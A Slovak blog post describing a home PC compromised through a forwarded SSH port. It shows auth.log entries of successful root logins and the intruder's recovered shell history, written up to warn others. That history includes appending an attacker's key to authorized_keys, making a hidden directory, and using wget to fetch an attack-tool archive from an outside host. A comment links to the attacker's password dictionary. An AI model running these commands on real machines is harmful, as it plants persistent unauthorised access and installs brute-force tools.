Okolo 22:15 mi stúpol náhle ping na 5s, a sieť sa stala nepoužiteľnou. Podozrieval som lacný D-Link router, a to že niekto ťahá torrenty, takže som ho reštartoval a čakal čo sa udeje. bude diať. Zmena nenastala, takže som sa šiel pozrieť k súrodencom do izby, a pri PC nikto nebol, keďže som vedel že nikto doma už nie je na internete, prišlo mi to divné a pustil som si iptraf na opustenom PC (program na sledovanie sieťového traffic-u). Vyrojilo sa na mňa množstvo prichádzajúcich a odchádzajúcich spojení, všetky s cieľovým portom 22. Hneď som si spomenul že na tento PC, mám z router-a presmerované ssh a začalo mi dochádzať. Rýchlo som vytiahol telefónny kábel z router-a aby odpojil internet a aby som mohol presmerovanie zrušiť. Následne som ho zrušil, nastavil hosts.allow, a hosts.deny a mám istotu že cez ssh sa mi nikto okrem mňa neprihlási. Ďalší krok spočíval v zistení škôd.
príkaz :
grep Accep auth.log* | grep -v 192.168vráti úspešné prihlásenia na ssh z inej ako vnútornej siete.
Výsledok : 4 prihlásenia z Iránu a US.
auth.log:Jan 1 18:23:49 myhost sshd[2670]: Accepted password for root from 217.219.201.24 port 51624 ssh2História :
auth.log:Jan 1 21:44:12 myhost sshd[3097]: Accepted password for root from 79.117.134.167 port 1104 ssh2
auth.log:Jan 1 22:00:17 myhost sshd[3139]: Accepted publickey for root from 79.117.134.167 port 1113 ssh2
auth.log.1:Dec 24 20:55:35 myhost sshd[9934]: Accepted password for root from 64.106.218.110 port 54198 ssh2
cat .proc/cpuinfoprihlásený bol asi 10-15 minút kým som neresetol PC. Pozrel si aký mam PC, stiahol si nástroje (v sťahovanom archíve mal sshd, screen, a skript pre slovníkový útok) a SP3 pre Windows 2000 :). Pridal si svoj kľuč aby sa mohol prihlasovať bez hesla, pustil si screen a preťažil mi router :). Riadky modrou farbou sú moje, kedy mi došlo čo sa asi deje a hľadal vinníka o chvíľu som odpojil sieť takže toho veľa nestihol.
cat /proc/cpuinfo
mkdir .,
/sbin/ifconfig | grep inet
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
cd /home
mkdir .ssh
cd .ssh
echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lb
a96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
cd ..
cd
cd /var/tmp
cd .,
ls -a
wget gabytzu.trei.ro/mc.tgz
tar zxvf mc.tgz
cd mc
chmod +x *
screen
exit
cd mc
chmod +x *
screen
exit
tail -f /var/log/auth.log
tail -f /var/log/auth.log*
cat /var/log/auth.log* | grep failure
cat /var/log/auth.log* | grep failure | wc -l
ls
dmesg
ping google.sk
iptraf
killall iptraf
top
tar zxvf mc.tgz
cd mc
chmod +x *
screen
exit
To že som mal ssh presmerované na PC, mi podľa logov pridalo asi 5300 neúspešných prihlásení od polovice novembra a 4 úspešné. Ako na nový rok tak po celý rok.
slovník s heslami ktorý chlapík použil (moje heslo je približne 30-te od začiatku)
3 komentáre:
tak pre vystrahu.. co si tam mal za heslo?
asi 30. od začiatku
http://init.in.funpic.de/hacked/pass.txt
Na takmer vsetky skriptovane pokusy o ssh pomaha zmena portu, na ktorom bezi sshd.
Zverejnenie komentára